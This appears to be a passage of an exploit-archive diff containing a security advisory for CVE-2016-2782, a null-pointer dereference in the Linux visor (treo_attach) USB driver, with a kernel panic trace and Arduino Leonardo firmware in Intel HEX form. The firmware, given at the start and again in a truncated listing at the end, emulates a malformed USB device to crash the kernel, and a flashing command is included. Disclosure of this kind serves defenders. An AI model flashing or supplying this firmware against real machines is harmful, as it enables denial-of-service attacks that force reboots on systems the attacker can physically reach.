:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F
:100B5000AF919F918F917F916F915F914F913F9155
:100B60002F911F910F91FF90EF90DF90CF90BF904A
:100B7000AF909F908F907F906F900F900FBE0F90CF
:100B80001F9018951F920F920FB60F9211248F93FA
:100B90009F938091E1001092E10083FF0FC01092BB
:100BA000E90091E09093EB001092EC0092E39093B7
:100BB000ED001092720598E09093F00082FF1AC049
:100BC00080917E05882339F080917E058150809345
:100BD0007E05882369F080917D05882359F08091F6
:100BE0007D05815080937D05811104C0289A02C043
:100BF0005D9AF1CF9F918F910F900FBE0F901F9034
:100C00001895CF93DF93CDB7DEB782E1FE0135961D
:100C1000A0E0B1E001900D928A95E1F78F89988D5F
:100C20009093760580937505898D9A8D90937405C0
:100C3000809373058B8D9C8D90937C0580937B05B1
:100C40008D8D9E8D90937A05809379058F8D98A1D7
:100C500090937805809377051092720581E08093D8
:100C6000D70080EA8093D80082E189BD09B400FEF4
:100C7000FDCF61E070E080E090E00E94790280E9C1
:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040C505020000010102030109029D
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF

1184
platforms/linux/dos/39538.txt Executable file
View file

File diff suppressed because it is too large Load diff

618
platforms/linux/dos/39539.txt Executable file
View file

@ -0,0 +1,618 @@
OS-S Security Advisory 2016-10
Linux visor (treo_attach) Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2016-2782
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (visor treo_attach driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the visor (treo_attach) driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x82d
idProduct: 0x200
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
The treo_attach function does not use the num_ports (struct usb_serial) value
for any kind of sanity checks during the initialization process. Due to an
incomplete sanity check, the driver could try to dereference a null-pointer if
a malformed device-descriptor is presented (zero-value for bNumEndpoints or no
required endpoint-descriptors is provided).
This results in a crash of the system.
****
...
554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \ /* Possible
Nullpointer-Dereference */
560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0);
573
574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL);
575 if (!swap_port)
576 return -ENOMEM;
577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */
578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */
579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */
...
****
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
This bug was fixed upstream. A CVE number was not assigned.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283374
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i
d=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0
Kernel Stacktrace:
[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200
[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 35.417186] usb 1-1: Product: Ä?
[ 35.421846] usb 1-1: Manufacturer: Ä?
[ 35.425686] usb 1-1: SerialNumber: %
[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 35.493316] usbcore: registered new interface driver visor
[ 35.503150] usbserial: USB Serial support registered for Handspring Visor /
Palm OS
[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0
[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5
[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected
[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at
00000000000000b0
[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]
[ 35.543244] PGD 0
[ 35.543244] Oops: 0002 [#1] SMP
[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT
xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables
ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle
ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat
nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack
iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm
ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4
i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif
cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy
dm_mirror dm_region_hash dm_log dm_mod
[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>]
treo_attach+0x61/0x340 [visor]
[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286
[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2
[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400
[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400
[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404
[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400
[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4:
00000000000006f0
[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 35.543244] Stack:
[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007
[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400
[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100
ffff88000bcd0090
[ 35.543244] Call Trace:
[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230
[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff
[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]
[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0
0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48>
89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90
[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]
[ 35.543244] RSP <ffff88000bd23a78>
[ 35.543244] CR2: 00000000000000b0
[ 35.973188] ---[ end trace b239663354a1c556 ]---
[ 35.978862] Kernel panic - not syncing: Fatal exception
[ 35.979835] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
